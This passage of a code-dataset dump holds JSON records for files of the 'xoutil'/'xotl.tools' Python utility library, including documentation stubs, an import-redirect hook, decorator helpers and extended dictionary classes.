toctree::\n :maxdepth: 1\n\n fs/path\n" }, { "alpha_fraction": 0.5698412656784058, "alphanum_fraction": 0.5952380895614624, "avg_line_length": 16.47222137451172, "blob_id": "0ffea67b201fff0ab542a41195003928946ee7b6", "content_id": "f396ddeecbc0f71bf765196f72c4b4e6f7013a1a", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 630, "license_type": "permissive", "max_line_length": 76, "num_lines": 36, "path": "/docs/source/index.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "\n.. xoutil documentation master file, created by\n sphinx-quickstart on Fri Jun 15 14:31:00 2012.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to xotl.tools's documentation!\n======================================\n\n.. automodule:: xotl.tools\n\nWhat's new in |release|\n-----------------------\n\n.. include:: history/_changes-2.2.0.rst\n\n\nContents\n--------\n\n.. 
toctree::\n :maxdepth: 1\n :glob:\n\n xotl.tools/*\n xoutil\n HISTORY\n CONTRIBUTING\n CONTRIBUTORS\n LICENSE\n\n\nIndices and tables\n==================\n\n* `genindex`:ref:\n* `search`:ref:\n" }, { "alpha_fraction": 0.6291891932487488, "alphanum_fraction": 0.6335135102272034, "avg_line_length": 25.428571701049805, "blob_id": "7d57c37df0ba7b68ca842a75248afd9514e510cc", "content_id": "30a0e55bc1ea5f76517c508b8071ae235bf9c1ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 926, "license_type": "no_license", "max_line_length": 77, "num_lines": 35, "path": "/xotl/tools/future/mimetypes.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to standard library `mimetype`:mod:.\n\nThis module reexport all functions the *current* version of Python.\n\n.. 
versionadded:: 1.8.4\n\n\"\"\"\n\n\nimport mimetypes as _stdlib\nfrom mimetypes import * # noqa\n\nfrom xotl.tools.symbols import Unset\n\n\ndef guess_type(url, strict=True, default=(None, None)):\n \"\"\"Guess the type of a file based on its filename or URL, given by url.\n\n This is the same as `mimetypes.guess_type`:func: with the addition of the\n `default` keyword\n\n \"\"\"\n type, encoding = _stdlib.guess_type(url, strict=strict)\n if default is not Unset and type is None:\n type, encoding = default\n return type, encoding\n" }, { "alpha_fraction": 0.6904761791229248, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 41, "blob_id": "7f8307f7b379a9baa9581aa22fb69fec1cfc9e34", "content_id": "6e14956c5b87a67cd1487059299519307ee937b2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 42, "license_type": "permissive", "max_line_length": 41, "num_lines": 1, "path": "/docs/source/history/_changes-1.7.11.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #9: TimeSpans are not hashable.\n" }, { "alpha_fraction": 0.6341535449028015, "alphanum_fraction": 0.6394900679588318, "avg_line_length": 33.418365478515625, "blob_id": "0fb689c1e93db8d2edea04c9a516f9e458589450", "content_id": "8e2abb5e54028c5843ee8ed022b7092b8307e50f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3374, "license_type": "no_license", "max_line_length": 78, "num_lines": 98, "path": "/xoutil/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you 
to.\n#\n'''Transition to a new namespace\n-----------------------------\n\nSince version 2.1, we're transitioning to another name: ``xotl.tools``. This\nis to align ``xoutil`` as a fundamental part of our family of projects under\nthe ``xotl`` namespace. *Xotl* is a Nahuatl word which may stand for\n'foundation'. ``xoutil`` is part of the foundation of many of our projects.\n\nBackwards compatible imports\n----------------------------\n\nSince 2.1, every module importable from ``xoutil`` is actually under the\nnamespace ``xotl.tools``; so importing, for instance, from\n``xoutil.future.datetime`` should be updated to\n`xotl.tools.future.datetime`:mod:.\n\nImporting from ``xoutil`` will still be possible in all versions before 3.0.\nYou won't have to change all your imports right away.\n\n\nDistribution of ``xoutil``\n--------------------------\n\nWill continue to distribute both `xotl.tools <xotl-tools-dist_>`__ and `xoutil\n<xoutil-dist_>`__ (with the same codebase) for the entire 2.1.x series. From\nversion 2.2.0+ will distruibute only ``xotl.tools``, but keep the backwards\nimport up to 3.0.\n\n.. warning:: Don't depend on both ``xoutil`` and ``xotl.tools``. We use the\n same codebase for both distributions; which means you'll get the same code,\n but if you install different versions you may get a crippled system.\n\n.. _xotl-tools-dist: https://pypi.org/project/xotl.tools\n.. 
_xoutil-dist: https://pypi.org/project/xoutil\n\n'''\n\nimport sys\nimport importlib\nfrom importlib.abc import MetaPathFinder\n\nXOUTIL_NAMESPACE = 'xoutil.'\nXOTL_TOOLS_NS = 'xotl.tools.'\n\n\nclass Hook(MetaPathFinder):\n def find_module(self, full_name, path=None):\n name = self._from_xoutil_to_xotl(full_name)\n if name:\n return self\n\n def _from_xoutil_to_xotl(self, full_name):\n if full_name.startswith(XOUTIL_NAMESPACE):\n path = full_name[len(XOUTIL_NAMESPACE):]\n return XOTL_TOOLS_NS + path\n else:\n return None\n\n def load_module(self, full_name):\n result = sys.modules.get(full_name, None)\n if result:\n return result\n modname = self._from_xoutil_to_xotl(full_name)\n result = None\n if modname:\n result = sys.modules.get(modname, None)\n if not result and modname:\n result = importlib.import_module(modname)\n if result:\n import warnings\n warnings.warn(\n ('Importing from xoutil ({}) is deprecated; '\n 'import from xotl.tools ({})').format(full_name, modname)\n )\n sys.modules[modname] = sys.modules[full_name] = result\n return result\n else:\n raise ImportError(modname)\n\n\n# I have to put this meta path before Python's standard, because otherwise\n# importing like this:\n#\n# from xoutil.future.datetime import TimeSpan\n#\n# First imports 'xoutil.future' with our Hook, but afterwards,\n# 'xoutil.future.datetime' is found by _frozen_importlib_external.PathFinder\n# instead of our own Hook which maintains 100% backwards compatibility of\n# imports.\nsys.meta_path.insert(0, Hook())\n" }, { "alpha_fraction": 0.573417067527771, "alphanum_fraction": 0.5766614079475403, "avg_line_length": 26.22222137451172, "blob_id": "ac25bec2ffbc47ecc341ec3ad44fba3d21392610", "content_id": "7239df3d4f8a3ec6b3537fa61ae1f495a13a8ea5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9556, "license_type": "no_license", "max_line_length": 86, "num_lines": 351, "path": "/xotl/tools/decorator/__init__.py", "repo_name": 
"merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Some useful decorators.\"\"\"\n\n# TODO: reconsider all this module\n\n\nimport sys\n\nfrom functools import wraps\nfrom types import FunctionType as function\n\nfrom xotl.tools.decorator.meta import decorator\n\n\n__all__ = (\n \"decorator\",\n \"AttributeAlias\",\n \"settle\",\n \"namer\",\n \"aliases\",\n \"assignment_operator\",\n \"instantiate\",\n \"memoized_instancemethod\",\n \"reset_memoized\",\n)\n\n\nclass AttributeAlias:\n \"\"\"Descriptor to create aliases for object attributes.\n\n This descriptor is mainly to be used internally by `aliases`:func:\n decorator.\n\n \"\"\"\n\n def __init__(self, attr_name):\n super().__init__()\n self.attr_name = attr_name\n\n def __get__(self, instance, owner):\n return getattr(instance or owner, self.attr_name)\n\n def __set__(self, instance, value):\n setattr(instance, self.attr_name, value)\n\n def __delete__(self, instance):\n delattr(instance, self.attr_name)\n\n\ndef settle(**kwargs):\n \"\"\"Returns a decorator to settle attributes to the decorated target.\n\n Usage::\n\n >>> @settle(name='Name')\n ... class Person:\n ... pass\n\n >>> Person.name\n 'Name'\n\n \"\"\"\n\n def inner(target):\n for attr in kwargs:\n setattr(target, attr, kwargs[attr])\n return target\n\n return inner\n\n\ndef namer(name, **kwargs):\n \"\"\"Like `settle`:func:, but '__name__' is a required positional argument.\n\n Usage::\n\n >>> @namer('Identity', custom=1)\n ... class I:\n ... 
pass\n\n >>> I.__name__\n 'Identity'\n\n >>> I.custom\n 1\n\n \"\"\"\n return settle(__name__=name, **kwargs)\n\n\ndef aliases(*names, **kwargs):\n \"\"\"In a class, create an `AttributeAlias`:class: descriptor for each\n definition as keyword argument (alias=existing_attribute).\n\n If \"names\" are given, then the definition context is looked and are\n assigned to it the same decorator target with all new names::\n\n >>> @aliases('foo', 'bar')\n ... def foobar(*args):\n ... 'This function is added to its module with two new names.'\n\n \"\"\"\n # FIX: This is not working in methods.\n def inner(target):\n \"\"\"Direct closure decorator that settle several attribute aliases.\"\"\"\n if kwargs:\n assert isinstance(target, type), '\"target\" must be a class.'\n if names:\n _locals = sys._getframe(1).f_locals\n for name in names:\n _locals[str(name)] = target\n if kwargs:\n for alias in kwargs:\n field = kwargs[alias]\n setattr(target, alias, AttributeAlias(field))\n return target\n\n return inner\n\n\n@decorator\ndef assignment_operator(func, maybe_inline=False):\n \"\"\"Makes a function that receives a name, and other args to get its first\n argument (the name) from an assignment operation, meaning that it if its\n used in a single assignment statement the name will be taken from the left\n part of the ``=`` operator.\n\n .. 
warning:: This function is dependant of CPython's implementation of the\n language and won't probably work on other implementations.\n Use only you don't care about portability, but use sparingly\n (in case you change your mind about portability).\n\n \"\"\"\n import inspect\n import ast\n\n if not isinstance(func, function):\n raise TypeError('\"func\" must be a function.')\n\n @wraps(func)\n def inner(*args):\n frm = sys._getframe(1)\n filename, line, funcname, src_lines, idx = inspect.getframeinfo(frm)\n try:\n sourceline = src_lines[idx].strip()\n parsed_line = ast.parse(sourceline, filename).body[0]\n assert maybe_inline or isinstance(parsed_line, ast.Assign)\n if isinstance(parsed_line, ast.Assign):\n assert len(parsed_line.targets) == 1\n assert isinstance(parsed_line.targets[0], ast.Name)\n name = parsed_line.targets[0].id\n elif maybe_inline:\n assert isinstance(parsed_line, ast.Expr)\n name = None\n else:\n assert False\n return func(name, *args)\n except (AssertionError, SyntaxError):\n if maybe_inline:\n return func(None, *args)\n else:\n return func(*args)\n finally:\n del filename, line, funcname, src_lines, idx\n\n return inner\n\n\n@decorator\ndef instantiate(target, *args, **kwargs):\n \"\"\"Some singleton classes must be instantiated as part of its declaration\n because they represents singleton objects.\n\n Every argument, positional or keyword, is passed as such when invoking the\n target. The following two code samples show two cases::\n\n >>> @instantiate\n ... class Foobar:\n ... def __init__(self):\n ... print('Init...')\n Init...\n\n\n >>> @instantiate('test', context={'x': 1})\n ... class Foobar:\n ... def __init__(self, name, context):\n ... print('Initializing a Foobar instance with name={name!r} '\n ... 
'and context={context!r}'.format(**locals()))\n Initializing a Foobar instance with name='test' and context={'x': 1}\n\n In all cases, Foobar remains the class, not the instance::\n\n >>> Foobar # doctest: +ELLIPSIS\n <class '...Foobar'>\n\n \"\"\"\n target(*args, **kwargs)\n return target\n\n\n@decorator\ndef constant_bagger(func, *args, **kwds):\n \"\"\"Create a \"bag\" with constant values.\n\n Decorated object must be a callable, but the result will be a class\n containing the constant values.\n\n For example::\n\n >>> @constant_bagger\n ... def MYBAG():\n ... return dict(X=1, Y=2)\n\n It will generate::\n\n class MYBAG:\n X = 1\n Y = 2\n\n When called with arguments, these will be used as actual arguments for the\n decorated function::\n\n >>> @constant_bagger(X=1, Y=2)\n ... def MYBAG(**kwds):\n ... return kwds\n\n Constant bags are singletons that can be updated::\n\n >>> MYBAG(Z=3) is MYBAG\n True\n\n >>> MYBAG.Z\n 3\n\n \"\"\"\n from xotl.tools.objects import mass_setattr\n\n wraps = ((a, getattr(func, a, None)) for a in (\"__doc__\", \"__module__\"))\n attrs = {a: v for (a, v) in wraps if v}\n attrs.update(__new__=mass_setattr, **func(*args, **kwds))\n return type(func.__name__, (object,), attrs)\n\n\n@decorator\ndef singleton(target, *args, **kwargs):\n \"\"\"Instantiate a class and assign the instance to the declared symbol.\n\n Every argument, positional or keyword, is passed as such when invoking the\n target. The following two code samples show two cases::\n\n >>> @singleton\n ... class foobar:\n ... def __init__(self):\n ... self.doc = 'foobar instance'\n\n >>> foobar.doc\n 'foobar instance'\n\n >>> @singleton('test', context={'x': 1})\n ... class foobar:\n ... def __init__(self, name, context):\n ... self.name = name\n ... 
self.context = context\n\n >>> foobar.name, foobar.context\n ('test', {'x': 1})\n\n >>> isinstance(foobar, type)\n False\n\n \"\"\"\n res = target(*args, **kwargs)\n if isinstance(target, type):\n try:\n\n def __init__(*args, **kwds):\n msg = \"'{}' is a singleton, it can be instantiated only once\"\n raise TypeError(msg.format(target.__name__))\n\n target.__init__ = __init__\n except Exception:\n pass\n return res\n\n\nclass memoized_instancemethod:\n \"\"\"Decorate a method memoize its return value.\n\n Best applied to no-arg methods: memoization is not sensitive to\n argument values, and will always return the same value even when\n called with different arguments.\n\n This is extracted from the SQLAlchemy project's codebase, merit and\n copyright goes to SQLAlchemy authors::\n\n Copyright (C) 2005-2011 the SQLAlchemy authors and contributors\n\n This module is part of SQLAlchemy and is released under the MIT License:\n http://www.opensource.org/licenses/mit-license.php\n\n \"\"\"\n\n def __init__(self, fget, doc=None):\n from warnings import warn\n\n msg = '\"memoized_instancemethod\" is now deprecated and it will be ' \"removed.\"\n warn(msg, stacklevel=2)\n self.fget = fget\n self.__doc__ = doc or fget.__doc__\n self.__name__ = fget.__name__\n\n def __get__(self, obj, cls):\n if obj is None:\n return self\n\n def oneshot(*args, **kw):\n result = self.fget(obj, *args, **kw)\n memo = lambda *a, **kw: result\n memo.__name__ = self.__name__\n memo.__doc__ = self.__doc__\n obj.__dict__[self.__name__] = memo\n return result\n\n oneshot.__name__ = self.__name__\n oneshot.__doc__ = self.__doc__\n return oneshot\n\n\ndef reset_memoized(instance, name):\n from warnings import warn\n\n msg = (\n '\"reset_memoized\" is now deprecated and it will be '\n 'removed. 
Use \"memoized_property.reset\".'\n )\n warn(msg, stacklevel=2)\n instance.__dict__.pop(name, None)\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod(verbose=True)\n" }, { "alpha_fraction": 0.5017927885055542, "alphanum_fraction": 0.5077420473098755, "avg_line_length": 28.74318504333496, "blob_id": "8df9d313611d7304d7f9881f2721e1115b4e11f0", "content_id": "63f144d5d600ed722843aa1268ee5f1cff5e1595", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62194, "license_type": "no_license", "max_line_length": 80, "num_lines": 2091, "path": "/xotl/tools/future/collections.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to Python's `collections` module.\n\nYou may use it as drop-in replacement of `collections`. Although we don't\ndocument all items here. 
Refer to `collections`:mod: documentation.\n\n\"\"\"\n\nfrom collections import * # noqa\n\ntry:\n from collections.abc import * # noqa\n from collections.abc import (\n Set,\n Iterable,\n Sized,\n Container,\n MutableSet,\n Mapping,\n MutableMapping,\n )\nexcept ImportError:\n from collections import (\n Set,\n Iterable,\n Sized,\n Container,\n MutableSet,\n Mapping,\n MutableMapping,\n )\n\n\nimport collections as _stdlib # noqa\nfrom collections import (\n _itemgetter,\n _heapq,\n _chain,\n _repeat, # noqa\n _starmap,\n _count_elements,\n)\n\nfrom xotl.tools.deprecation import deprecated # noqa\nfrom xotl.tools.symbols import Unset # noqa\nfrom xotl.tools.objects import SafeDataItem as safe # noqa\nfrom xotl.tools.reprlib import recursive_repr # noqa\n\n\nclass safe_dict_iter(tuple):\n \"\"\"Iterate a dictionary in a safe way.\n\n This is useful when a dictionary can be modified while iterating on it,\n for example::\n\n >>> d = {1: 2, 3: 4, 5: 6}\n >>> di = safe_dict_iter(d)\n\n >>> for k, v in di.items():\n ... 
d[v] = k\n\n >>> [(k, v) for (k, v) in di.items()]\n [(1, 2), (3, 4), (5, 6)]\n\n >>> del d[1]\n\n >>> [(k, v) for (k, v) in di.items()]\n [(3, 4), (5, 6)]\n\n >>> [k for k in di]\n [3, 5]\n\n \"\"\"\n\n def __new__(cls, mapping):\n self = super().__new__(cls, mapping)\n self._mapping = mapping\n return self\n\n def __str__(self):\n cls_name = type(self).__name__\n res = str(\", \").join(str(i) for i in self)\n return str(\"{}({})\").format(cls_name, res)\n\n __repr__ = __str__\n\n def __len__(self):\n return sum(1 for key in self)\n\n def __contains__(self, key):\n res = super().__contains__(key)\n return res and key in self.mapping\n\n def __nonzero__(self):\n return bool(len(self))\n\n __bool__ = __nonzero__\n\n def __iter__(self):\n for key in super().__iter__():\n if key in self._mapping:\n yield key\n\n keys = __iter__\n\n def values(self):\n for key in self:\n if key in self._mapping:\n yield self._mapping[key]\n\n def items(self):\n for key in self:\n if key in self._mapping:\n yield (key, self._mapping[key])\n\n\nclass defaultdict(_stdlib.defaultdict):\n \"\"\"A hack for ``collections.defaultdict`` that passes the key and a copy of\n self as a plain dict (to avoid infinity recursion) to the callable.\n\n Examples::\n\n >>> from xotl.tools.future.collections import defaultdict\n >>> d = defaultdict(lambda key, d: 'a')\n >>> d['abc']\n 'a'\n\n Since the second parameter is actually a dict-copy, you may (naively) do\n the following::\n\n >>> d = defaultdict(lambda k, d: d[k])\n >>> d['abc']\n Traceback (most recent call last):\n ...\n KeyError: 'abc'\n\n\n You may use this class as a drop-in replacement for\n ``collections.defaultdict``::\n\n >>> d = defaultdict(lambda: 1)\n >>> d['abc']\n 1\n\n \"\"\"\n\n def __missing__(self, key):\n if self.default_factory is not None:\n try:\n return self.default_factory(key, dict(self))\n except TypeError:\n # This is the error when the arguments are not expected.\n return super().__missing__(key)\n else:\n raise 
KeyError(key)\n\n\nclass OpenDictMixin:\n \"\"\"A mixin for mappings implementation that expose keys as attributes.\n\n For example:\n\n >>> from xotl.tools.objects import SafeDataItem as safe\n >>> class MyOpenDict(OpenDictMixin, dict):\n ... __slots__ = safe.slot(OpenDictMixin.__cache_name__, dict)\n\n >>> d = MyOpenDict({'es': 'spanish'})\n >>> d.es\n 'spanish'\n\n >>> d['es'] = 'espanol'\n >>> d.es\n 'espanol'\n\n When setting or deleting an attribute, the attribute name is regarded as\n key in the mapping if neither of the following condition holds:\n\n - The name is a `slot`.\n\n - The object has a ``__dict__`` attribute and the name is key there.\n\n This mixin defines the following features that can be redefined:\n\n ``_key2identifier``\n\n Protected method, receives a key as argument and must return a valid\n identifier that is used instead the key as an extended attribute.\n\n ``__cache_name__``\n\n Inner field to store a cached mapping between actual keys and\n calculated attribute names. The field must be always implemented as a\n `SafeDataItem` descriptor and must be of type `dict`. There are two\n ways of implementing this:\n\n - As a slot. The first time of this implementation is an example.\n Don't forget to pass the second parameter with the constructor\n `dict`.\n\n - As a normal descriptor::\n\n >>> from xotl.tools.objects import SafeDataItem as safe\n >>> class MyOpenDict(OpenDictMixin, dict):\n ... safe(OpenDictMixin.__cache_name__, dict)\n\n Classes or Mixins that can be integrated with `dict` by inheritance must\n not have a `__slots__` definition. Because of that, this mixin must not\n declare any slot. 
If needed, it must be declared explicitly in customized\n classed like in the example in the first part of this documentation or in\n the definition of `opendict` class.\n\n \"\"\"\n\n __cache_name__ = str(\"_inverted_cache\")\n\n def __dir__(self):\n \"\"\"Return normal \"dir\" plus valid keys as attributes.\"\"\"\n # TODO: Check if super must be called if defined\n from xotl.tools.objects import fulldir\n\n return list(set(~self) | fulldir(self))\n\n def __getattr__(self, name):\n from xotl.tools.future.inspect import get_attr_value\n\n _mark = object()\n res = get_attr_value(self, name, _mark)\n if res is not _mark:\n return res\n else:\n key = (~self).get(name)\n if key:\n return self[key]\n else:\n msg = \"'%s' object has no attribute '%s'\"\n raise AttributeError(msg % (type(self).__name__, name))\n\n def __setattr__(self, name, value):\n cls = type(self)\n desc = getattr(cls, name, None)\n if desc is not None: # Prioritize descriptors\n try:\n desc.__set__(self, value)\n except Exception:\n pass\n key = (~self).get(name)\n if key:\n self[key] = value\n else:\n super().__setattr__(name, value)\n\n def __delattr__(self, name):\n key = (~self).get(name)\n if key:\n del self[key]\n else:\n super().__delattr__(name)\n\n def __invert__(self):\n \"\"\"Return an inverted mapping between key and attribute names.\n\n Keys of the resulting dictionary are identifiers for attribute names\n and values are original key names.\n\n Class attribute \"__separators__\" are used to calculate it and is\n cached in '_inverted_cache slot safe variable.\n\n Several keys could have the same identifier, only one will be valid and\n used.\n\n To obtain this mapping you can use as the unary operator \"~\".\n\n \"\"\"\n KEY_LENGTH = \"length\"\n KEY_MAPPING = \"mapping\"\n cache = self._cache\n cached_length = cache.setdefault(KEY_LENGTH, 0)\n length = len(self)\n if cached_length != length:\n cache[KEY_LENGTH] = length\n aux = ((self._key2identifier(k), k) for k in self)\n res = {key: 
attr for key, attr in aux if key}\n cache[KEY_MAPPING] = res\n else:\n res = cache.get(KEY_MAPPING)\n if res is None:\n assert cached_length == 0\n res = {}\n cache[KEY_MAPPING] = res\n return res\n\n @property\n def _cache(self):\n from xotl.tools.future.inspect import get_attr_value\n\n try:\n return get_attr_value(self, type(self).__cache_name__)\n except AttributeError:\n res = setattr(self, type(self).__cache_name__, dict())\n return res\n\n @staticmethod\n def _key2identifier(key):\n \"\"\"Convert keys to valid identifiers.\n\n This method could be redefined in sub-classes to change this feature.\n This function must return a valid identifier or None if the conversion\n is not possible.\n\n \"\"\"\n # TODO: Improve this in order to obtain a full-mapping. For example,\n # the corresponding attribute names for the keys ``'-x-y'`` and\n # ``'x-y'`` are the same, in that case only one will be returning.\n from xotl.tools.keywords import suffix_kwd\n from xotl.tools.string import slugify\n from xotl.tools.validators import is_valid_identifier\n\n res = key if is_valid_identifier(key) else slugify(key, \"_\")\n return suffix_kwd(res)\n\n\nclass SmartDictMixin:\n \"\"\"A mixin that extends the `update` method of dictionaries\n\n Standard method allow only one positional argument, this allow several.\n\n Note on using mixins in Python: method resolution order is calculated in\n the order of inheritance, if a mixin is defined to overwrite behavior\n already existent, use first that classes with it. 
See `SmartDict`:class:\n below.\n\n \"\"\"\n\n def update(*args, **kwds):\n \"\"\"Update this dict from a set of iterables `args` and keyword values\n `kwargs`.\n\n Each positional argument could be:\n\n - another mapping (any object implementing \"keys\" and\n `~object.__getitem__`:meth: methods.\n\n - an iterable of (key, value) pairs.\n\n \"\"\"\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n for key, value in smart_iter_items(*args, **kwds):\n self[key] = value\n\n # TODO: Include new argument ``full=True`` to also search in string\n # values. Maybe this kind of feature will be better in a function\n # instead a method.\n def search(self, pattern):\n \"\"\"Return new mapping with items which key match a `pattern` regexp.\n\n This function always tries to return a valid new mapping of the same\n type of the caller instance. If the constructor of corresponding type\n can't be called without arguments, then look up for a class\n variable named `__search_result_type__` or return a standard\n Python dictionary if not found.\n\n \"\"\"\n from re import compile\n\n regexp = compile(pattern)\n cls = type(self)\n try:\n res = cls()\n except Exception:\n from xotl.tools.future.inspect import get_attr_value\n\n creator = get_attr_value(cls, \"__search_result_type__\", None)\n res = creator() if creator else {}\n for key in self:\n if regexp.search(key):\n res[key] = self[key]\n return res\n\n\nclass SmartDict(SmartDictMixin, dict):\n \"\"\"A \"smart\" dictionary that can receive a wide variety of arguments.\n\n See `SmartDictMixin.update`:meth: and :meth:`SmartDictMixin.search`.\n\n \"\"\"\n\n def __init__(*args, **kwargs):\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n super().__init__()\n self.update(*args, **kwargs)\n\n\nclass opendict(OpenDictMixin, dict):\n \"\"\"A dictionary implementation that mirrors its keys as attributes.\n\n For example::\n\n >>> d = opendict(es='spanish')\n >>> d.es\n 'spanish'\n\n 
>>> d['es'] = 'espanol'\n >>> d.es\n 'espanol'\n\n Setting attributes not already included *does not* makes them keys::\n\n >>> d.en = 'English'\n >>> set(d)\n {'es'}\n\n \"\"\"\n\n __slots__ = safe.slot(OpenDictMixin.__cache_name__, dict)\n\n @classmethod\n def from_enum(cls, enumclass):\n \"\"\"Creates an opendict from an enumeration class.\n\n If `enumclass` lacks the ``__members__`` dictionary, take the\n ``__dict__`` of the class disregarding the keys that cannot be `public\n identifiers\n <xotl.tools.validators.identifiers.is_valid_public_identifier>`:func:.\n If `enumclass` has the ``__members__`` attribute this is the same as\n ``opendict(enumclass.__members__)``.\n\n Example:\n\n .. code-block:: python\n\n >>> from xotl.tools.future.collections import opendict\n >>> @opendict.from_enum\n >>> class Foo:\n ... x = 1\n ... _y = 2\n\n >>> type(Foo) is opendict\n True\n\n >>> dict(Foo)\n {'x': 1}\n\n \"\"\"\n from xotl.tools.symbols import Unset\n from xotl.tools.validators.identifiers import is_valid_public_identifier\n\n members = getattr(enumclass, \"__members__\", Unset)\n if members is Unset:\n members = {\n k: v\n for k, v in enumclass.__dict__.items()\n if is_valid_public_identifier(k)\n }\n return cls(members)\n\n\nclass codedict(OpenDictMixin, dict):\n \"\"\"A dictionary implementation that evaluate keys as Python expressions.\n\n This is also a open dict (see `OpenDictMixin`:class: for more info).\n\n Example:\n\n >>> cd = codedict(x=1, y=2, z=3.0)\n >>> '{_[x + y]} is 3 -- {_[x + z]} is 4.0'.format(_=cd)\n '3 is 3 -- 4.0 is 4.0'\n\n It supports the right shift (``>>``) operator as a format operand (using\n ``_`` as the special name for the code dict):\n\n >>> cd >> '{_[x + y]} is 3 -- {_[x + z]} is 4.0 -- {x} is 1'\n '3 is 3 -- 4.0 is 4.0 -- 1 is 1'\n\n It also implements the left shift (``<<``) operator:\n\n >>> '{_[x + y]} is 3 -- {_[x + z]} is 4.0 -- {x} is 1' << cd\n '3 is 3 -- 4.0 is 4.0 -- 1 is 1'\n\n .. 
versionadded:: 1.8.3\n\n \"\"\"\n\n def __getitem__(self, key):\n try:\n return super().__getitem__(key)\n except KeyError:\n if isinstance(key, str):\n return eval(key, dict(self))\n else:\n raise\n\n def __rshift__(self, arg):\n return arg.format(_=self, **self)\n\n __rlshift__ = __rshift__\n\n\nclass StackedDict(OpenDictMixin, SmartDictMixin, MutableMapping):\n \"\"\"A multi-level mapping.\n\n A level is entered by using the `push`:meth: and is leaved by calling\n `pop`:meth:.\n\n The property `level`:attr: returns the actual number of levels.\n\n When accessing keys they are searched from the latest level \"upwards\", if\n such a key does not exists in any level a KeyError is raised.\n\n Deleting a key only works in the *current level*; if it's not defined there\n a KeyError is raised. This means that you can't delete keys from the upper\n levels without `popping <pop>`:func:.\n\n Setting the value for key, sets it in the current level.\n\n .. versionchanged:: 1.5.2 Based on the newly introduced `ChainMap`:class:.\n\n \"\"\"\n\n __slots__ = (\n safe.slot(\"inner\", ChainMap),\n safe.slot(OpenDictMixin.__cache_name__, dict),\n )\n\n def __init__(*args, **kwargs):\n # Each data item is stored as {key: {level: value, ...}}\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n self.update(*args, **kwargs)\n\n @property\n def level(self):\n \"\"\"Return the current level number.\n\n The first level is 0. 
Calling `push`:meth: increases the current\n level (and returns it), while calling `pop`:meth: decreases the\n current level (if possible).\n\n \"\"\"\n return len(self.inner.maps) - 1\n\n def push_level(self, *args, **kwargs):\n \"\"\"Pushes a whole new level to the stacked dict.\n\n :param args: Several mappings from which the new level will be\n initialled filled.\n\n :param kwargs: Values to fill the new level.\n\n :returns: The pushed `level`:attr: number.\n\n \"\"\"\n self.inner = self.inner.new_child()\n self.update(*args, **kwargs)\n return self.level\n\n @deprecated(push_level)\n def push(self, *args, **kwargs):\n \"\"\"Don't use thid method, use new `push_level`:meth: instead.\"\"\"\n return self.push_level(*args, **kwargs)\n\n def pop(self, *args):\n \"\"\"Remove this, always use original `MutableMapping.pop`:meth:.\n\n If none arguments are given, `pop_level`:meth: is called and a\n deprecation warning is printed in `sys.stderr` the first time. If one\n or two arguments are given, those are interpreted as (key, default)\n values of the super class `pop`:meth:.\n\n \"\"\"\n if len(args) == 0:\n cls = type(self)\n if not hasattr(cls, \"_bad_pop_called\"):\n import warnings\n\n setattr(cls, \"_bad_pop_called\", True)\n msg = (\n \"Use `pop` method without parameters is deprecated, \"\n \"use `pop_level` instead\"\n )\n warnings.warn(msg, stacklevel=2)\n return self.pop_level()\n else:\n return super().pop(*args)\n\n def pop_level(self):\n \"\"\"Pops the last pushed level and returns the whole level.\n\n If there are no levels in the stacked dict, a TypeError is raised.\n\n :returns: A dict containing the poped level.\n\n \"\"\"\n if self.level > 0:\n stack = self.inner\n res = stack.maps[0]\n self.inner = stack.parents\n return res\n else:\n raise TypeError(\"Cannot pop from StackedDict without any levels\")\n\n def peek(self):\n \"\"\"Peeks the top level of the stack.\n\n Returns a copy of the top-most level without any of the keys from\n lower 
